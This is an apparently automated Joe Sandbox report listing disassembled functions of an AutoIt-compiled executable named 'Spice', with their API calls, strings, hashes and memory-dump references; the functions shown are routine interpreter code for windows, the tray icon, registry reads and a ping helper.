Opcode ID: 2e4b76caa9675a0c14906494a53b0fbdc08ad81cd45e29c8fd970b9b77d84b77
Instruction ID: 598a21479ad09c4d8fe83618a0b6bfdf22efe1719abbe7afce32cab7cde5f220
Opcode Fuzzy Hash: 2e4b76caa9675a0c14906494a53b0fbdc08ad81cd45e29c8fd970b9b77d84b77
Instruction Fuzzy Hash: 6BC2AE70608341DFD728DF24C885BABB7E5BF84304F14991DF58AA72A2CB71E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E733E6 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E73444
RegisterClassExW.USER32(00000030), ref: 00E7346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
LoadIconW.USER32(000000A9), ref: 00E734C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1

Strings

+, xrefs: 00E7342D
AutoIt v3 GUI, xrefs: 00E73460
TaskbarCreated, xrefs: 00E73474
0, xrefs: 00E73426

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4e97a45c5eeb6685a4fc629a34722362eb801dc16e4aba2a3241e5d99a1f6046
Instruction ID: 6b0b7096b70a39457e03e7e248693b55cb046d90df1d89f24bc7b0dc9eb400d6
Opcode Fuzzy Hash: 4e97a45c5eeb6685a4fc629a34722362eb801dc16e4aba2a3241e5d99a1f6046
Instruction Fuzzy Hash: B33158B184430DAFDB50DFA4EC89BCDBBF1FB09320F10415AE580A62A0DBB94545EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E73411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E73444
RegisterClassExW.USER32(00000030), ref: 00E7346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
LoadIconW.USER32(000000A9), ref: 00E734C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1

Strings

+, xrefs: 00E7342D
AutoIt v3 GUI, xrefs: 00E73460
TaskbarCreated, xrefs: 00E73474
0, xrefs: 00E73426

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 69f6ef6d5a383de6c93d1aa16f3d598a0e83b0c7c1f94b349eef76d213774469
Instruction ID: 732805a0c6b49c3e7db1dec132806ceff62ea8b60eea5fe486eed4666649f25c
Opcode Fuzzy Hash: 69f6ef6d5a383de6c93d1aa16f3d598a0e83b0c7c1f94b349eef76d213774469
Instruction Fuzzy Hash: AA21E5B190430DAFDB10AFA4EC89B9EBBF5FB08720F10411AF915A62A0DBB55544EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E82FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E900CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E83094), ref: 00E900ED

Part of subcall function 00E908C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E8309F), ref: 00E908E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E830E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00EC01BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00EC01FB
RegCloseKey.ADVAPI32(?), ref: 00EC0239
_wcscat.LIBCMT ref: 00EC0292

Strings

Software\AutoIt v3\AutoIt, xrefs: 00E830D8
\Include\, xrefs: 00E8309F
Include, xrefs: 00EC01B1, 00EC01F2
\, xrefs: 00EC02B5

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: b5881c8fc135fe8ccf3bfe619639677a8001cdf31bf46211ca601b5f9662a839
Instruction ID: 2bfc446ded259d9d963ea5a0ef6ab57dcffbb69506696461c39c6bedcb6c7cdc
Opcode Fuzzy Hash: b5881c8fc135fe8ccf3bfe619639677a8001cdf31bf46211ca601b5f9662a839
Instruction Fuzzy Hash: EC717D715093059EC704EF25E8819ABBBE9FF443A0F40152EF449A32B1EF35D94AEB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E8514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E85156
LoadCursorW.USER32(00000000,00007F00), ref: 00E85165
LoadIconW.USER32(00000063), ref: 00E8517C
LoadIconW.USER32(000000A4), ref: 00E8518E
LoadIconW.USER32(000000A2), ref: 00E851A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E851C6
RegisterClassExW.USER32(?), ref: 00E8521C

Part of subcall function 00E73411: GetSysColorBrush.USER32(0000000F), ref: 00E73444
Part of subcall function 00E73411: RegisterClassExW.USER32(00000030), ref: 00E7346E
Part of subcall function 00E73411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E7347F
Part of subcall function 00E73411: InitCommonControlsEx.COMCTL32(?), ref: 00E7349C
Part of subcall function 00E73411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E734AC
Part of subcall function 00E73411: LoadIconW.USER32(000000A9), ref: 00E734C2
Part of subcall function 00E73411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E734D1

Strings

#, xrefs: 00E85201
AutoIt v3, xrefs: 00E8520B
0, xrefs: 00E851FA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: dffa103d67ce5a7dba4dd7ebdab5753d4437f9c1b2bfd7ac9b174f2af01126a7
Instruction ID: 9b7fcf6c0b41f5a0f92094c47a415fc8cebb8b7ea68d64836d0713448ae997d5
Opcode Fuzzy Hash: dffa103d67ce5a7dba4dd7ebdab5753d4437f9c1b2bfd7ac9b174f2af01126a7
Instruction Fuzzy Hash: 33212DB190430DAFEB20AFA4ED09B9E7BB6FB08720F004159F504A62A1D7B69550EF94

Uniqueness

Uniqueness Score: -1.00%

Function 00EE5E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00EE5E7E
inet_addr.WSOCK32(?,?,?), ref: 00EE5EC3
gethostbyname.WS2_32(?), ref: 00EE5ECF
IcmpCreateFile.IPHLPAPI ref: 00EE5EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5FD8
WSACleanup.WSOCK32 ref: 00EE5FDE

Strings

Ping, xrefs: 00EE5F01

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 16e4bb6aba1384d6afee8554b27f899eb706bffc2b806140f53961c25e8edf7d
Instruction ID: b13967cb5e5451f021d11f49d1d0d39d9e584822474ca246670baef1bc32eb19
Opcode Fuzzy Hash: 16e4bb6aba1384d6afee8554b27f899eb706bffc2b806140f53961c25e8edf7d
Instruction Fuzzy Hash: 7C51AE326046459FDB20EF25CC49B2AB7E4EF48718F145529F999AB2A1DB70E900DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00E84D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E84E22
KillTimer.USER32(?,00000001), ref: 00E84E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E84E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E84E7A
CreatePopupMenu.USER32 ref: 00E84E8E
PostQuitMessage.USER32(00000000), ref: 00E84EAF

Strings

TaskbarCreated, xrefs: 00E84E75

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: e9ad0f731c18e439f3fbebef486f18b6f9d9029710f27feb0aed4f3980f63b88
Instruction ID: a289ca6899acabe3d206535c7cc454f81b827df74a82974d411cbcc9880801d3
Opcode Fuzzy Hash: e9ad0f731c18e439f3fbebef486f18b6f9d9029710f27feb0aed4f3980f63b88
Instruction Fuzzy Hash: 744133F120830FEADB217F689C09BBA3696F740311F002119F50DBA1E2CA659C00FB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E856F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00EC0C5B

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

_memset.LIBCMT ref: 00E85787
_wcscpy.LIBCMT ref: 00E857DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E857EB
__swprintf.LIBCMT ref: 00EC0CD1

Strings

Line %d: , xrefs: 00EC0CCB
AutoIt - , xrefs: 00E85760

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 353fc634aee31a3ba58a1296211458f7aa1bb2247cd148fa5fce36859a526876
Instruction ID: 0dbe7ddc7edb67e118bf374cd6c782792a350daafd25af51dd11818799664690
Opcode Fuzzy Hash: 353fc634aee31a3ba58a1296211458f7aa1bb2247cd148fa5fce36859a526876
Instruction Fuzzy Hash: 7041A2B1008304AAD321FB60DC45FDFB7DCAB44364F10561EF58DA21A2EF30A64ADB96

Uniqueness

Uniqueness Score: -1.00%

Function 00E850DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E85109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E8512A
ShowWindow.USER32(00000000), ref: 00E8513E
ShowWindow.USER32(00000000), ref: 00E85147

Strings

edit, xrefs: 00E85124
AutoIt v3, xrefs: 00E85101, 00E85106, 00E85107

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1f67df7227dea6fcd464aa17bd70e6c54ad18aa25382d2cbd994569ed4f31c17
Instruction ID: 703fbc8830a07dc2a9b8dc2614b3343ce2dfb4ada0d12f3b18c376cb5660bb7e
Opcode Fuzzy Hash: 1f67df7227dea6fcd464aa17bd70e6c54ad18aa25382d2cbd994569ed4f31c17
Instruction Fuzzy Hash: 37F0B7B1645398BAEB712727AC48F673E7EE7C6F60F00011AB900A21A1CA655851FEB0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E84A8C: _fseek.LIBCMT ref: 00E84AA4

Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DE1
Part of subcall function 00ED9CF1: _wcscmp.LIBCMT ref: 00ED9DF4

_free.LIBCMT ref: 00ED9C5F
_free.LIBCMT ref: 00ED9C66
_free.LIBCMT ref: 00ED9CD1

Part of subcall function 00E92F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92F99
Part of subcall function 00E92F85: GetLastError.KERNEL32(00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92FAB

_free.LIBCMT ref: 00ED9CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00ED9B8F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: bfba8a2bcdaab3b063d8f2c62350033ee82bfee0e683f6fffc53538dd2134e4a
Instruction ID: 31895bc931e94ddbd52780f0a4b05ddc3874ff83d1f5875d3cbf6d029c783c4d
Opcode Fuzzy Hash: bfba8a2bcdaab3b063d8f2c62350033ee82bfee0e683f6fffc53538dd2134e4a
Instruction Fuzzy Hash: DB514CB1A04219AFDF24DF64DC41AAEBBB9FF48304F00109EB659B7381DB715A808F58

Uniqueness

Uniqueness Score: -1.00%

Function 00E9563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00E9569B
_memcpy_s.LIBCMT ref: 00E9570D
__read_nolock.LIBCMT ref: 00E9576B
__filbuf.LIBCMT ref: 00E9578E
_memset.LIBCMT ref: 00E957D2

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 50c98695c5b15128326cf4566f86fcea4c1e2adc1985bed629389e8a9adb71fb
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 6951C572A00B05DBDF268FB9C8806AE77B5AF41324F24972EF835B62D1D7709E509B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E752B0 Relevance: 7.6, APIs: 5, Instructions: 99
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E752E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E7534A
TranslateMessage.USER32(?), ref: 00E75356
DispatchMessageW.USER32(?), ref: 00E75360

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 2b8a0dfcbe683fe7f73226f9c3e67a2022e970914e82c5029f2f3470c8e67cab
Instruction ID: 050af984daaf817bc541aa6e241068e403fa9a98d2515a6b3dba264abc12c5d5
Opcode Fuzzy Hash: 2b8a0dfcbe683fe7f73226f9c3e67a2022e970914e82c5029f2f3470c8e67cab
Instruction Fuzzy Hash: 19316A71508B0AAFDB309B64DC04BFA77E9AB01318F20A059E02AB71F1D7F1A444F711

Uniqueness

Uniqueness Score: -1.00%

Function 00E71284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E71275,SwapMouseButtons,00000004,?), ref: 00E712EB

Strings

Control Panel\Mouse, xrefs: 00E712A6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 2655df6ffba1831365862ae776ba743d90319f2541ad40e238efa8b46088a134
Instruction ID: c46d3f4247eaa8eb79e50d05b6d99875dbb70ea5dcfbfb1a3fad6397c2e882be
Opcode Fuzzy Hash: 2655df6ffba1831365862ae776ba743d90319f2541ad40e238efa8b46088a134
Instruction Fuzzy Hash: A7115A71514248BFDB208FA8DC84EEEBBBCEF05744F009599F809E7120D7319E44A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E85B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E85B58

Part of subcall function 00E856F8: _memset.LIBCMT ref: 00E85787
Part of subcall function 00E856F8: _wcscpy.LIBCMT ref: 00E857DB
Part of subcall function 00E856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E857EB

KillTimer.USER32(?,00000001,?,?), ref: 00E85BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E85BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EC0D7C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f7a4e38ffe0f3d16dfecc96b1cb581deb7fb69dfdf0c3b59197e59fef657a84c
Instruction ID: b5b416bbe2c41e63d0a444820cb05a41c0f757eb931e77d310a5e6dbb6ab1d50
Opcode Fuzzy Hash: f7a4e38ffe0f3d16dfecc96b1cb581deb7fb69dfdf0c3b59197e59fef657a84c
Instruction Fuzzy Hash: C8210A71504784AFEB729B648C95FEBBFECAF11308F00148DE69E66141C7752A85DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00E8278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00E849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E827AF,?,00000001), ref: 00E849F4

_free.LIBCMT ref: 00EBFB04
_free.LIBCMT ref: 00EBFB4B

Part of subcall function 00E829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E82ADF

Strings

Bad directive syntax error, xrefs: 00EBFB33

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 4b64d85e4b071622c417e8cce07a7dc3524e97cc82d99e4156b1f3224738d877
Instruction ID: 27de1b6b1864831db9dff7e8c0f04a8cae6ef626c59e55d564f8a40b15994746
Opcode Fuzzy Hash: 4b64d85e4b071622c417e8cce07a7dc3524e97cc82d99e4156b1f3224738d877
